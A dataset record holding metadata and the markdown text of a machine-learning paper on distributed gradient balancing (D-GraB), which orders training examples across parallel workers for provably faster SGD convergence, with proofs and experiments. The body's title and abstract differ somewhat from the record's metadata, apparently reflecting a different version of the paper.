| field | type | length (min–max) |
|---|---|---|
| id | string | 10–10 |
| title | string | 7–231 |
| abstract | string | 3–2.43k |
| authors | string | 5–21.5k |
| published_date | string | 20–20 |
| link | string | 33–34 |
| markdown | string | 133–1.92M |
2302.00845
Coordinating Distributed Example Orders for Provably Accelerated Training
Recent research on online Gradient Balancing (GraB) has revealed that there exist permutation-based example orderings for SGD that are guaranteed to outperform random reshuffling (RR). Whereas RR arbitrarily permutes training examples, GraB leverages stale gradients from prior epochs to order examples -- achieving a provably faster convergence rate than RR. However, GraB is limited by design: while it demonstrates an impressive ability to scale-up training on centralized data, it does not naturally extend to modern distributed ML workloads. We therefore propose Coordinated Distributed GraB (CD-GraB), which uses insights from prior work on kernel thinning to translate the benefits of provably faster permutation-based example ordering to distributed settings. With negligible overhead, CD-GraB exhibits a linear speedup in convergence rate over centralized GraB and outperforms distributed RR on a variety of benchmark tasks.
A. Feder Cooper, Wentao Guo, Khiem Pham, Tiancheng Yuan, Charlie F. Ruan, Yucheng Lu, Christopher De Sa
2023-02-02T03:15:29Z
http://arxiv.org/abs/2302.00845v5
# Scale up with Order: Finding Good Data Permutations ###### Abstract Gradient Balancing (GraB) is a recently proposed technique that finds provably better data permutations when training models with multiple epochs over a finite dataset. It converges at a faster rate than the widely adopted Random Reshuffling, by minimizing the discrepancy of the gradients on adjacently selected examples. However, GraB only operates under critical assumptions such as small batch sizes and centralized data, leaving open the question of how to order examples at large scale--i.e. distributed learning with decentralized data. To alleviate this limitation, in this paper we propose D-GraB, an algorithm that orders the examples in a parallel setting with negligible overhead, and which enjoys a linear speedup at rate \(\tilde{O}((mnT)^{-2/3})\) on smooth non-convex objectives and \(\tilde{O}((mnT)^{-2})\) under the PL condition, where \(n\) denotes the number of parallel workers, \(m\) denotes the number of examples per worker and \(T\) denotes the number of epochs. D-GraB benefits from both data ordering and parallelism. Empirically, we show on various applications including GLUE, CIFAR10 and WikiText-2 that D-GraB outperforms naive parallel GraB and Distributed Random Reshuffling in terms of both training and validation performance. ## 1 Introduction Training a machine learning model nowadays can easily involve millions or billions of data examples (e.g. ImageNet (Russakovsky et al., 2015); Wikipedia and BooksCorpus (Devlin et al., 2019)). At this scale, it is crucial to leverage distributed training to process all the examples (Li et al., 2013) for a wall-clock time speedup. Orthogonal to parallelism, a recent line of research shows it is possible to find provably better data permutations than random ones for accelerated model convergence (Lu et al., 2021; Mohtashami et al., 2022; Lu et al., 2022). Concretely, Lu et al. (2022) proposes Gradient Balancing (GraB) approaches, which determine the order in which the dataset is scanned in each epoch by minimizing the discrepancy of the gradient errors computed on adjacently selected examples. Lu et al. (2022) proves that GraB converges faster than the case where random permutations are used (Mishchenko et al., 2020). Despite these intriguing properties, the practicality of GraB is limited. More specifically, GraB (Lu et al., 2022) critically requires that every single example in the dataset is sequentially visited during training, and that the average gradients computed on all examples stay close over epochs. This prevents us from scaling it up in practice, since when a large batch size (parallelism) is used, a batch of examples is visited simultaneously rather than sequentially. In addition, parallelism usually comes with large learning rates, which can potentially make the averaged gradients vary significantly over epochs. In light of this, a natural research question is: _Can we find better data permutations than random reshuffling when parallelism (mini-batching) is used?_ In this paper, we give an affirmative answer by proposing D-GraB, an algorithm that alleviates the limitations of the original GraB approach and is well suited to distributed learning.
D-GraB involves two novel designs: (1) it balances the gradients without leveraging the stale gradient mean adopted in GraB, which gives better balancing approximations even when large learning rates are used; (2) based on the existing parallel learning framework Parameter Server, it additionally lets the server run a parallel ordering protocol, which determines the desired data ordering for each worker in the subsequent epoch. D-GraB mitigates the limitation of GraB that each example must be sequentially visited, with very little overhead. We prove that the convergence of D-GraB is faster than distributed random reshuffling (Yun et al., 2021). We show that, under the same assumptions as the original GraB (Lu et al., 2022), D-GraB enjoys a linear speedup at rate \(O((mnT)^{-2/3})\) on smooth non-convex objectives and \(\tilde{O}((mnT)^{-2})\) under the PL condition, where \(n\) denotes the number of parallel workers, \(m\) denotes the number of examples per worker and \(T\) denotes the number of epochs. We substantiate our theory on a variety of applications including GLUE, CIFAR10 and WikiText-2. Our contributions in this paper can be summarized as follows: * We propose the parallel herding problem, which captures the vector balancing problem in the distributed setting with the constraint that data cannot be transferred among the workers. * We propose D-GraB, an algorithm that involves a data ordering-aware variant of Parameter Server, which enables distributed training while determining good data permutations for each parallel worker, and we demonstrate how D-GraB solves the parallel herding problem. * We prove that, under the same assumptions as the original GraB (Lu et al., 2022), D-GraB enjoys a linear speedup at rate \(O((mnT)^{-2/3})\) on smooth non-convex objectives and \(\tilde{O}((mnT)^{-2})\) under the PL condition, where \(n\) denotes the number of parallel workers, \(m\) denotes the number of examples per worker and \(T\) denotes the number of epochs, which is provably faster than distributed random reshuffling (Yun et al., 2021). * We show on various applications including GLUE, CIFAR10, and WikiText-2 that D-GraB outperforms naive parallel GraB and random reshuffling in terms of both training and validation performance. ## 2 Related Work **Data Ordering.** Training a machine learning model usually requires scanning over the training dataset following some order. Traditional ordering strategies, such as importance sampling, decide such an ordering in a with-replacement fashion (Schmidt et al., 2017; Needell et al., 2014; Lu et al., 2021). These approaches also include curriculum learning (Bengio et al., 2009), which orders the examples to mimic human learning and improve generalization (Graves et al., 2017; Matiisen et al., 2019; Soviany et al., 2022). In the domain of large scale model training, without-replacement sampling is usually adopted (Bottou, 2012). A common practice is to train models for multiple epochs, and in each epoch the optimizer scans over the entire dataset following a given permutation. There are two common ways to decide the permutations in one epoch: Random Reshuffling (RR) (Ying et al., 2017), where the permutations are random and different over epochs; and Shuffle Once (SO) (Bertsekas, 2011; Gurbuzbalaban et al., 2019), where a random permutation is used but remains fixed over epochs.
Recht and Re (2012) undertook the first theoretical investigation of RR, while subsequent works like (Yun et al., 2021, De Sa, 2020) give counterexamples where RR orders badly. Indeed, many studies indicate that RR and SO are only beneficial under certain conditions (Mishchenko et al., 2020; HaoChen and Sra, 2019; Gurbuzbalaban et al., 2021). The limitations of RR and SO give rise to a recent line of research on finding better permutations than random ones. Rajput et al. (2022) introduces an interesting variant of RR by reversing the ordering every other epoch, achieving better rates for quadratics. Lu et al. (2021) and Mohtashami et al. (2022) were the first to advocate the importance of correlation among adjacently selected examples. It is proven in (Lu et al., 2021) that if the averages of consecutive stochastic gradients converge faster to the full gradient, then SGD with the corresponding sampling strategy has a faster convergence rate. A recent work (Lu et al., 2022) connects this insight to the classic herding problem (Harvey and Samadi, 2014) and proposes Gradient Balancing (GraB), which solves this problem with much lower complexity than (Lu et al., 2021; Mohtashami et al., 2022). Despite its elegance, GraB is still limited in scalability for distributed learning settings, which is our main focus in this paper. **Efficient Distributed Training.** Training a machine learning model in a distributed environment has been an active research area over the last decades (Dean et al., 2012). There have been various lines of research focusing on speeding up distributed training, such as using asynchrony (Niu et al., 2011; Lian et al., 2015; De Sa et al., 2015; Lu et al., 2020), decentralization (Lian et al., 2017; Lu and De Sa, 2021), compression [Alistarh et al., 2017, Bernstein et al., 2018, Wangni et al., 2018, Wang et al., 2018a], local steps [Stich, 2018, Woodworth et al., 2020, Lin et al., 2019], and combinations of the above techniques [Koloskova et al., 2019, Basu et al., 2019, Lu et al., 2022b]. While most of these algorithms focus on improving communication efficiency, recent studies indicate that data ordering can be another crucial factor for scaling up distributed training. Yun et al. [2021a] conducts a thorough theoretical analysis of the case where Random Reshuffling is used on all the parallel workers, and advocates sharing random seeds among workers to select the permutations (a method referred to as SyncShuf). Some follow-up works emphasize the importance of Random Reshuffling on the server side in distributed training [Huang et al., 2021, Malinovsky et al., 2022, Sadiev et al., 2022]. While these studies provide great heuristics, it is still unclear how parallel workers should find better data permutations in a collaborative way, which motivates our work. ## 3 Preliminaries In this section, we illustrate the original GraB approach [Lu et al., 2022a] and its insights. We show how GraB finds provably better data permutations than random ones via the classic herding and balancing framework. Note that throughout this section, the discussion is carried out in a non-parallel setting. Training a machine learning model can be formulated as minimizing a differentiable (loss) function \(f:\mathbb{R}^{d}\rightarrow\mathbb{R}\) over \(N\) data examples.
The goal is to obtain the target model weights \(w^{*}=\arg\min_{w}f(w)\), where \(f(w)=\frac{1}{N}\sum_{i=1}^{N}f(w;i)\), and \(f(w;i)\) denotes the loss incurred on the \(i\)-th example (usually an image, a sentence, etc.). A typical training process is to iteratively update the model parameter \(w\) starting from some initial \(w_{1}\) by running \[w_{t+1}=w_{t}-\alpha\nabla f(w_{t};\pi(t))\qquad t=1,2,\cdots \tag{1}\] where \(\alpha\) denotes the learning rate, and \(\pi:[N]\rightarrow[N]\) denotes a permutation (ordering) from which the examples are chosen to compute the example gradients. A common choice for \(\pi\) is a random permutation, which is usually referred to as random reshuffling. GraB [Lu et al., 2022a] was the first to propose finding better \(\pi\) in Equation (1) than random ones, which yields faster convergence. The main insight there is to find \(\pi\) that minimizes the discrepancy of subsequent gradient errors. More formally, Lu et al. [2022a] shows that any permutation \(\pi^{*}\) that guarantees \[\max_{k\in[N]}\left\|\sum_{j=1}^{k}\left(\nabla f(w;\pi(j))-\nabla f(w)\right)\right\|_{\infty} \tag{2}\] to be invariant to \(N\) gives a better rate of \(O((NT)^{-2/3})\) than Random Reshuffling at \(O(N^{-1/3}T^{-2/3})\) on smooth non-convex problems, where \(T\) denotes the number of epochs. The main technique introduced in [Lu et al., 2022a] to find \(\pi\) is leveraged from a classic herding and balancing framework, as introduced below. **Herding and Vector Balancing.** The _herding_ problem [Harvey and Samadi, 2014] can be described as follows: Given \(N\) vectors \(\{x_{i}\}_{i=1}^{N}\in\mathbb{R}^{d}\) with \(\left\|x_{i}\right\|_{2}\leq 1,\forall i\) and \(\sum_{i=1}^{N}x_{i}=0\), the goal of herding is to find a permutation \(\pi^{*}\) so that: \[\max_{k\in[N]}\left\|\sum_{i=1}^{k}x_{\pi^{*}(i)}\right\|_{\infty}=\tilde{O}(1) \tag{3}\] It is straightforward to observe that the herding problem generalizes Equation (2). Harvey and Samadi (2014) solve this problem via a subroutine named _balancing_. Concretely, balancing optimizes any given \(\pi\) to reduce the bound in Equation (3) based on a signed version of the herding problem: \[\max_{k\in[N]}\left\|\sum_{i=1}^{k}s_{\pi(i)}x_{\pi(i)}\right\|_{\infty} \tag{4}\] where \(\{s_{i}\}_{i=1}^{N}\in\{+1,-1\}\). Harvey and Samadi (2014) provably show that given an arbitrary \(\pi\), calling Algorithm 1 produces a new permutation \(\pi^{\prime}\) such that \[\max_{k\in[N]}\left\|\sum_{i=1}^{k}x_{\pi^{\prime}(i)}\right\|_{\infty}\leq \frac{1}{2}\max_{k\in[N]}\left\|\sum_{i=1}^{k}s_{\pi(i)}x_{\pi(i)}\right\|_{\infty}+\frac{1}{2}\max_{k\in[N]}\left\|\sum_{i=1}^{k}x_{\pi(i)}\right\|_{\infty}\] Notice that with the new permutation, the objective of Equation (3) now approaches the bound of Equation (4). It has been shown in the recent literature that it is quite cheap to find a group of signs such that Equation (4) is in the order of \(\tilde{O}(1)\) (Alweiss et al., 2021) for arbitrary \(\pi\), as shown for example in Algorithm 4 (in the Appendix). And so if we call Algorithm 1 repeatedly, we will eventually obtain the \(\pi^{*}\) that solves Equation (3). **Gradient Balancing.** Given the herding and balancing framework, GraB (Lu et al., 2022) applies it to minimize Equation (2). The main challenge is then to find the right \(x_{i}\) from the herding and balancing framework in the optimization context. Note that the herding and balancing framework requires all the vectors to sum to zero.
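To make the herding-and-balancing step concrete, here is a minimal sketch on synthetic zero-sum vectors. It is an illustration only: the greedy sign rule below is a deterministic stand-in for the randomized balancing walk of Alweiss et al. (2021), the positives-first/negatives-last reordering follows the usual description of the herding-to-balancing reduction, and all function names are hypothetical rather than taken from Algorithm 1 or 4 (which are not reproduced in this excerpt).

```python
import numpy as np

def assign_signs(vectors):
    """Greedily pick s_i in {+1, -1} so the running signed sum stays small
    (a deterministic stand-in for the Alweiss et al. (2021) balancing walk)."""
    running = np.zeros_like(vectors[0])
    signs = []
    for x in vectors:
        s = 1 if np.linalg.norm(running + x, np.inf) <= np.linalg.norm(running - x, np.inf) else -1
        signs.append(s)
        running = running + s * x
    return signs

def reorder(order, signs):
    """Build a new permutation from the signs: positively signed positions
    first (in order), negatively signed positions last (in reverse)."""
    pos = [idx for idx, s in zip(order, signs) if s > 0]
    neg = [idx for idx, s in zip(order, signs) if s < 0]
    return pos + neg[::-1]

def herding_bound(vectors, order):
    """The herding objective of Equation (3): max_k || sum_{j<=k} x_{order(j)} ||_inf."""
    prefix = np.cumsum(np.stack([vectors[i] for i in order]), axis=0)
    return np.abs(prefix).max()

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    xs = rng.normal(size=(1000, 16))
    xs -= xs.mean(axis=0)                           # make the vectors sum to zero
    xs /= np.linalg.norm(xs, axis=1).max()          # cap the 2-norms at 1
    order = list(range(len(xs)))
    print("random order:", herding_bound(xs, order))
    for _ in range(5):                              # repeated balancing shrinks the bound
        order = reorder(order, assign_signs([xs[i] for i in order]))
    print("balanced    :", herding_bound(xs, order))
```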
To cope with the zero-sum requirement, GraB proposes centering the gradients using the stale mean. More specifically, denoting \(\pi_{t}\) as the permutation adopted in the \(t\)-th epoch, GraB calls Algorithm 1 with \[x_{i}=\nabla f(w_{t}^{i};\pi_{t}(i))-\frac{1}{N}\sum_{j=1}^{N}\nabla f(w_{t-1}^{j};\pi_{t-1}(j)) \tag{5}\] where \(w_{t}^{i}\) denotes the model weights after \(i-1\) updates in the \(t\)-th epoch. Lu et al. (2022) provably show that this definition of \(x_{i}\) preserves the benefits of balancing with negligible noise. The only overhead of GraB is then to store the running average of the gradients in one epoch in order to "center" the gradients in the subsequent epoch. ## 4 Distributed Gradient Balancing In this section, we give a more formal description of distributed training and illustrate the limitations of GraB in this context. We then formulate the parallel herding problem and illustrate how we can order data in a distributed setting without using the stale mean. We formulate all our approaches into an algorithm named D-GraB. We conclude this section by proving that D-GraB enjoys a linear speedup in convergence. **Setup.** We consider the standard data-parallel training setup with \(n\) parallel workers, where each worker keeps a copy of the model weights \(w\in\mathbb{R}^{d}\). Each worker maintains \(m=N/n\) examples 1 (data points), and the workers collaborate to find a target model weight \(w\in\mathbb{R}^{d}\) that minimizes the averaged loss incurred on all the examples over all the workers. This can be formally expressed as, Footnote 1: Without loss of generality, we assume that the number of workers \(n\) divides the total number of examples \(N\), and that \(2\) divides \(m\). \[\min_{w\in\mathbb{R}^{d}}\frac{1}{n}\sum_{i=1}^{n}f^{i}(w)\quad\text{with}\quad f^{i}(w)=\frac{1}{m}\sum_{j=1}^{m}f^{i}(w;j) \tag{6}\] where \(f^{i}(w;j):\mathbb{R}^{d}\rightarrow\mathbb{R}\), \(j\in[m]\), denotes the loss incurred on the \(j\)-th example on the \(i\)-th worker over model weight \(w\). We assume the examples cannot be shared or transferred among the workers. This setup naturally captures many real-world applications such as federated learning. Consider running Equation (1) in this setup, where each worker scans over its local examples using (potentially) different permutations. We denote by \(\pi_{t,i}:[m]\rightarrow[m]\) the permutation adopted on the \(i\)-th worker in the \(t\)-th epoch. The update to the model can then be summarized as: \[w_{t}^{j+1}=w_{t}^{j}-\frac{\alpha}{n}\sum_{i=1}^{n}\nabla f^{i}(w_{t}^{j};\pi_{t,i}(j)) \tag{7}\] for \(j\in[m]\), where \(w_{t}^{j}\) denotes the model weights after \(j\) gradient updates in the \(t\)-th epoch. That is, in epoch \(t\), all the workers select the \(j\)-th example locally according to \(\{\pi_{t,i}\}_{i=1}^{n}\) to compute stochastic gradients. **Issue with GraB in distributed training.** Given the constraint of parallelism and the fact that examples cannot be transferred among the workers, it is obvious that Algorithm 1 can no longer guarantee Equation (3). Moreover, larger learning rates are usually adopted in practice when the system scales up (Smith et al., 2018), which makes the stale mean approach (Equation (5)) unreliable, as the averaged gradients in adjacent epochs no longer stay close. To address these limitations, we next introduce the _parallel herding_ problem and a balancing subroutine named _PairBalance_.
**Parallel Herding.** We adapt the herding problem to the following: Given a group of \(x_{i,j}\in\mathbb{R}^{d}\) for \(i\in[n]\), \(j\in[m]\) with \(\|x_{i,j}\|_{2}\leq 1\) and \(\sum_{ij}x_{ij}=0\), the goal of parallel herding is to find \(n\) permutations, \(\pi_{1},\pi_{2},\ldots,\pi_{n}\) of \(\{1,\ldots,m\}\), so as to minimize \[\max_{k\in\{1,\ldots,m\}}\ \left\|\sum_{j=1}^{k}\sum_{i=1}^{n}x_{i,\pi_{i}(j)}\right\|_{\infty} \tag{8}\] This formulation naturally captures the property that \(x_{i,j}\) cannot be transferred among the workers. We next introduce a new balancing subroutine that solves this problem. **Insights from Kernel Thinning.** The intuition upon which we build our approach to parallel herding is closely connected to recent research on _Kernel Thinning_ (Dwivedi and Mackey, 2021a,b, Barp et al., 2022). Concretely, the original kernel thinning paper (Dwivedi and Mackey, 2021a) introduces an algorithm that minimizes the Maximum Mean Discrepancy (MMD) between a selected coreset and an empirical distribution. It also analyzes a new self-balancing Hilbert walk that generalizes the algorithm introduced in (Alweiss et al., 2021). Methodologically, Dwivedi and Mackey (2021a) solve the coreset selection problem in two phases: (1) iteratively halving the input vector sequence into balanced coresets; and (2) selecting and refining a candidate coreset that minimizes the MMD with the input sequence. The method uses a balancing walk on differences of pairs of examples to select exactly half of the points in a dataset, and comes with a useful property: it eliminates the requirement of knowing the maximum vector norm ahead of time and of centering the vectors (i.e., making all the vectors sum to zero). **PairBalance.** Following the insight from _Kernel Thinning_, we balance vector differences over paired vectors, so as to eliminate vector centering. We extend this insight to the distributed training setting, and propose the PairBalance subroutine. The high-level idea of the PairBalance algorithm is to apply Algorithm 1 to the following "flattened" and "paired" sequence: \[y_{n(k-1)+i}\gets x_{i,2k-1}-x_{i,2k}.\] This new sequence has the nice property that, by pairing the vectors, the differences become invariant to the vector mean. In other words, if all the vectors are shifted by the same noise, their pairwise differences remain the same. Now, fitting \(\{y_{i}\}_{i=1}^{N/2}\) into the herding and balancing framework, we can see that each sign assigned to a \(y\) decides the signs of the paired \(x\)'s simultaneously. More concretely, if \(s\) is the sign associated with \(y_{n(k-1)+i}\), then \(x_{i,2k-1}\) and \(x_{i,2k}\) receive opposite signs \(s\) and \(-s\), respectively. Denote by \(x_{i,k}^{+}\) the term that receives the positive sign and by \(x_{i,k}^{-}\) the one that receives the negative sign; then for any \(i\in[n]\) and \(l\in[m/2]\) \[\sum_{k=1}^{l}\sum_{i=1}^{n}x_{i,k}^{+} =\frac{1}{2}\sum_{j=1}^{m}\sum_{i=1}^{n}x_{i,j}+\frac{1}{2}\sum_{k=1}^{l}\sum_{i=1}^{n}\left(x_{i,k}^{+}-x_{i,k}^{-}\right)\] \[\sum_{k=1}^{l}\sum_{i=1}^{n}x_{i,k}^{-} =\frac{1}{2}\sum_{j=1}^{m}\sum_{i=1}^{n}x_{i,j}-\frac{1}{2}\sum_{k=1}^{l}\sum_{i=1}^{n}\left(x_{i,k}^{+}-x_{i,k}^{-}\right)\] These equations, similar to the herding case, allow us to bound the parallel herding objective. Most importantly, they allow us to bound Equation (8) without moving the examples across workers. We now prove the correctness of PairBalance.
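Before the formal guarantee, the pairing idea can be sketched as follows. This is a minimal, single-process illustration with hypothetical helper names: the greedy sign choice again stands in for the balancing walk, the reordering rule is the same positives-first convention as above, and nothing here is a quotation of the paper's actual PairBalance pseudocode.

```python
import numpy as np

def choose_sign(running, y):
    """Pick the sign that keeps the running signed sum small (illustrative)."""
    return 1 if np.linalg.norm(running + y, np.inf) <= np.linalg.norm(running - y, np.inf) else -1

def pair_balance(X):
    """PairBalance sketch on X of shape (n, m, d): n workers, m examples per
    worker (m even).  For every pair of consecutive examples on a worker, the
    paired difference is balanced and the two examples get opposite signs."""
    n, m, d = X.shape
    signs = np.zeros((n, m), dtype=int)
    running = np.zeros(d)
    for k in range(m // 2):                     # pair index, flattened as y_{n(k-1)+i}
        for i in range(n):                      # worker index
            y = X[i, 2 * k] - X[i, 2 * k + 1]   # difference is insensitive to a common shift
            s = choose_sign(running, y)
            running = running + s * y
            signs[i, 2 * k], signs[i, 2 * k + 1] = s, -s
    return signs

def reorder(perm, worker_signs):
    """Positively signed positions first (in order), negatively signed last (in reverse)."""
    pos = [p for p, s in zip(perm, worker_signs) if s > 0]
    neg = [p for p, s in zip(perm, worker_signs) if s < 0]
    return pos + neg[::-1]

def parallel_herding_bound(X, perms):
    """Equation (8): max_k || sum_{j<=k} sum_i x_{i, perm_i(j)} ||_inf."""
    n, m, _ = X.shape
    summed = np.stack([sum(X[i][perms[i][j]] for i in range(n)) for j in range(m)])
    return np.abs(np.cumsum(summed, axis=0)).max()

if __name__ == "__main__":
    rng = np.random.default_rng(1)
    n, m, d = 4, 256, 8
    X = rng.normal(size=(n, m, d))
    X -= X.mean(axis=(0, 1))                    # all vectors sum to zero
    X /= np.linalg.norm(X, axis=2).max()        # cap the 2-norms at 1
    perms = [list(range(m)) for _ in range(n)]
    print("before:", parallel_herding_bound(X, perms))
    for _ in range(10):                         # repeated PairBalance + reorder
        ordered = np.stack([X[i][perms[i]] for i in range(n)])
        signs = pair_balance(ordered)
        perms = [reorder(perms[i], signs[i]) for i in range(n)]
    print("after :", parallel_herding_bound(X, perms))
```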
Note that in the previous section, we introduced a concrete algorithm (Algorithm 4 in the Appendix) that guarantees the signed herding objective (Equation (4)) to be in the order of \(\tilde{O}(1)\). To make this more general, we make the following assumption. **Assumption 1**.: _There exist a balancing algorithm Balance and a constant \(\tilde{A}>0\) such that for any input vectors \(\{x_{i}\}_{i=1}^{N}\) with \(\left\|x_{i}\right\|_{2}\leq 1\) and \(\sum_{i=1}^{N}x_{i}=0\), Balance outputs a sequence of signs \(\{s_{i}\}_{i=1}^{N}\in\{-1,1\}\) such that_ \[\max_{k\in[N]}\left\|\sum_{i=1}^{k}s_{i}x_{i}\right\|_{\infty}\leq\tilde{A}\] With this assumption, we now provide the correctness guarantee of PairBalance in the following lemma. **Lemma 1**.: _Consider vectors \(x_{i,j}\) for \(i\in[n]\) and \(j\in[m]\) that satisfy:_ \[\left\|\sum_{j=1}^{m}\sum_{i=1}^{n}x_{i,j}\right\|_{\infty}\leq c_{1}\] \[\left\|x_{i,j}-\frac{1}{mn}\sum_{j=1}^{m}\sum_{i=1}^{n}x_{i,j}\right\|_{\infty}\leq c_{2}\ \forall\ i,j\] _for some constants \(c_{1}>0\) and \(c_{2}>0\). Let \(\pi_{i}^{\prime}(j)\) be the output of Algorithm 1 using inputs:_ \[y_{n(k-1)+i}=x_{i,\pi_{i}(2k-1)}-x_{i,\pi_{i}(2k)}\] _for \(k\in[m/2]\) and initial order \(\pi_{i}(j)\); then it holds that:_ \[\max_{l\in[m]}\left\|\sum_{j=1}^{l}\sum_{i=1}^{n}x_{i,\pi_{i}^{\prime}(j)}\right\|_{\infty}\leq \frac{1}{2}\max_{l\in[m]}\left\|\sum_{j=1}^{l}\sum_{i=1}^{n}x_{i,\pi_{i}(j)}\right\|_{\infty}+c_{1}+\tilde{A}c_{2}.\] Lemma 1 shows that PairBalance reduces the herding objective towards a constant (invariant to \(n\)) at each step. This implies that repeatedly calling PairBalance on a given permutation eventually yields a permutation that guarantees the parallel herding bound to be \(\tilde{O}(1)\). To better understand the effectiveness of PairBalance, we perform a simulation experiment on 1 million zero-centered random vectors with unit \(L_{2}\) norm. In the right subfigure, each worker gets a partition of all the random vectors and performs the balance and reorder algorithms for 15 rounds. The random vectors cannot be moved across different workers. The results are shown in Figure 1, and more details can be found in Appendix A.1. **D-GraB.** With the parallel herding problem solved, we now introduce the full-stack algorithm that trains the model in a distributed setting while ordering the examples based on PairBalance. We give the formal description in Algorithm 2. Note that the Balance subroutine in Algorithm 2 can be replaced by PairBalance. We proceed to provide the convergence guarantee for D-GraB (Algorithm 2). We start with a few assumptions. **Assumption 2** (**Bounded Gradient Variance**).: \(\forall i\in[n]\) _there exists a constant \(\sigma>0\) such that \(\forall j\in[m],\forall w\in\mathbb{R}^{d}\), it holds that_ \[\left\|\nabla f^{i}(w,j)-\nabla f^{i}(w)\right\|_{2}^{2}\leq\sigma^{2}\] **Assumption 3** (**Bounded Data Heterogeneity**).: _There exists a constant \(\varsigma>0\) such that \(\forall i\in[n]\),_ \[\left\|\nabla f^{i}(w)-\nabla f(w)\right\|_{2}^{2}\leq\varsigma^{2}\] Figure 1: Herding Bound & Parallel Herding Bound of Multiple Balance Algorithms. Independent Balance and Independent PairBalance mean that each parallel worker runs the Balance and PairBalance subroutines independently, respectively. The first two assumptions are common in the distributed optimization setting, enforcing that the deviation of the gradient of each local loss function \(\nabla f^{i}(w,j)\), or node \(\nabla f^{i}(w)\), from its mean is uniformly bounded.
Although we require uniform boundedness, our upper bound is deterministic, in contrast to an in-expectation bound, which usually goes with the weaker bounded variance assumption. **Assumption 4** (**Smoothness**).: _There exist constants \(L_{\infty}>0\) and \(L_{2,\infty}>0\) such that for any \(w,v\in\mathbb{R}^{d}\) and any \(j\in[m]\), it holds that_ \[\left\|\nabla f^{i}(w,j)-\nabla f^{i}(v,j)\right\|_{\infty}\leq L_{\infty}\|w-v\|_{\infty}\] _and_ \[\left\|\nabla f^{i}(w,j)-\nabla f^{i}(v,j)\right\|_{2}\leq L_{2,\infty}\|w-v\|_{\infty}\] **Assumption 5** (**PL Condition**).: _We say the loss function \(f\) fulfills the Polyak-Lojasiewicz (PL) condition if there exists \(\mu>0\) such that for any \(w\in\mathbb{R}^{d}\),_ \[\frac{1}{2}\|\nabla f(w)\|_{2}^{2}\geq\mu(f(w)-\inf_{v\in\mathbb{R}^{d}}f(v))\] Similar to Lu et al. (2022), we use the cross-norm \(L_{2,\infty}\) smoothness. Note that we can also use the commonly adopted \(L_{2}\)-smoothness: this assumption is then implied with smoothness parameter \(\sqrt{d}L_{2}\). We now give the convergence bound of D-GraB as follows. **Theorem 1**.: _In Algorithm 2, if we use Algorithm 3 as the Balance subroutine and set \(\alpha\) to be:_ \[\alpha=\min\left\{\frac{1}{16\max\{L_{\infty},L_{2,\infty}\}(2m+\tilde{A}/n)},\left(\frac{4F_{1}}{m\Gamma T}\right)^{1/3}\right\},\] _then under Assumptions 1–4 it holds that:_ \[\frac{1}{T}\sum_{t=1}^{T}\left\|\nabla f(w_{t})\right\|_{2}^{2}\leq\tilde{O}\left(\frac{1}{(mnT)^{2/3}}+\frac{1}{T}\right),\] _where \(F_{1}=f(w_{1})-\inf_{w}f(w)\) and_ \[\Gamma=\frac{24(L_{2,\infty}(\varsigma+\sigma)\tilde{A})^{2}}{n^{2}}+\frac{9L_{2,\infty}^{2}m^{2}\sigma^{2}}{T}.\] _Furthermore, under Assumption 5, it holds that_ \[f(w_{T})-\inf_{w\in\mathbb{R}^{d}}f(w)\leq\tilde{O}\left(\frac{1}{m^{2}n^{2}T^{2}}\right).\] Figure 2: PairBalance in Centralized Data (Left) & Decentralized Data (Right) Settings. \(x_{ij}\) denotes the \(j\)-th vector on the \(i\)-th worker. Comparing the bound to (Lu et al., 2022), we can see that D-GraB enjoys the same fast convergence speed as the original GraB while ensuring a linear speedup over the number of workers. D-GraB also converges at rate \(\tilde{O}((mnT)^{-2})\) under the PL condition, faster than the high-probability bound of \(\tilde{O}(T^{-2}(mn)^{-1})\) in Yun et al. (2021) (termed minibatch RR in their paper), and even faster than the \(\tilde{O}((nT)^{-2}m^{-1})\) rate of their synchronized shuffling trick, which requires bounded component-wise outer deviation. ## 5 Experiment **Model and Dataset.** We investigate the performance of PairBalance in real applications with centralized and decentralized data. We adopt the following model training tasks for evaluation: (1) logistic regression with BERT (Devlin et al., 2019) embeddings on two GLUE (Wang et al., 2018) tasks (QQP, QNLI), (2) LeNet (Lecun et al., 1998) on CIFAR-10 (Krizhevsky et al., 2009), and (3) LSTM (Hochreiter and Schmidhuber, 1997) on WikiText-2 (Merity et al., 2018). Details of the datasets and models can be found in Appendix A.2. ### Centralized Data In this setting, a single worker holds the entire dataset. We investigate PairBalance's convergence rate against the Balance algorithm provided in Lu et al. (2022) and Random Reshuffling on a single GPU. **Baseline Example Ordering Algorithms** * **Centralized Random Reshuffling (C-RR)** The RR sorter gets a random permutation of the entire dataset at the start of each epoch. * **Centralized Balance (C-B)** We use the GraB algorithm provided by Lu et al. (2022).
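For concreteness, the balance-and-reorder epoch underlying C-B can be sketched on a toy least-squares problem as shown below. This is a hedged illustration, not the authors' implementation: it centers each fresh gradient with the stale mean from the previous epoch in the spirit of Equation (5), assigns signs greedily (a stand-in for the balancing walk), and, for simplicity, reorders after the epoch rather than on the fly; all names are hypothetical.

```python
import numpy as np

def example_grad(w, a, b):
    """Gradient of the per-example loss f(w; (a, b)) = 0.5 * (a @ w - b)^2."""
    return (a @ w - b) * a

def balance_and_reorder(centered, order):
    """Sign-then-reorder step on the centered gradients (illustrative)."""
    running = np.zeros_like(centered[order[0]])
    pos, neg = [], []
    for idx in order:
        x = centered[idx]
        s = 1 if np.linalg.norm(running + x, np.inf) <= np.linalg.norm(running - x, np.inf) else -1
        running = running + s * x
        (pos if s > 0 else neg).append(idx)
    return pos + neg[::-1]

def grab_epoch(w, A, b, order, stale_mean, lr=0.05):
    """One epoch: SGD in the given order, center gradients with the stale mean
    (Equation (5)), and produce the example order for the next epoch."""
    centered = {}
    grad_sum = np.zeros_like(w)
    for idx in order:
        g = example_grad(w, A[idx], b[idx])
        centered[idx] = g - stale_mean
        grad_sum += g
        w = w - lr * g
    next_order = balance_and_reorder(centered, order)
    return w, next_order, grad_sum / len(order)    # new stale mean

if __name__ == "__main__":
    rng = np.random.default_rng(2)
    N, d = 512, 10
    A = rng.normal(size=(N, d))
    b = A @ rng.normal(size=d) + 0.01 * rng.normal(size=N)
    w, order, stale_mean = np.zeros(d), list(range(N)), np.zeros(d)
    for epoch in range(5):
        w, order, stale_mean = grab_epoch(w, A, b, order, stale_mean)
        print(f"epoch {epoch}: full train loss {0.5 * np.mean((A @ w - b) ** 2):.4f}")
```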
